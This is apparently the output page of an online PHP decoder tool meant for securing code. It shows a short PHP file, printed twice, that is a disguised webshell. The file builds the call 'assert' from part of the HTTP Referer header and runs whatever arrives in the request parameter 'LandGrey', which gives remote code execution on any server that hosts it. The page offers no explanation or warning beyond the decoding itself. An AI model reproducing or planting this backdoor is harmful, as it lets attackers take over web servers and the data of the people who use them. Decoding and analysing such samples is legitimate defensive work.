Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */ $password = "LandGrey"; $wx = s..

Decoded Output download

<?php 
/** 
 * Noticed: (PHP 5 >= 5.3.0, PHP 7) 
 * 
 */ 
$password = "LandGrey"; 
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4); 
forward_static_call_array($wx."ert", array($_REQUEST[$password])); 
?>

Did this file decode correctly?

Original Code

<?php
/**
 * Noticed: (PHP 5 >= 5.3.0, PHP 7)
 *
 */
$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>

Function Calls

substr 1

Variables

$password LandGrey

Stats

MD5 e79024578f92218cba575e3ee83c4dee
Eval Count 0
Decode Time 97 ms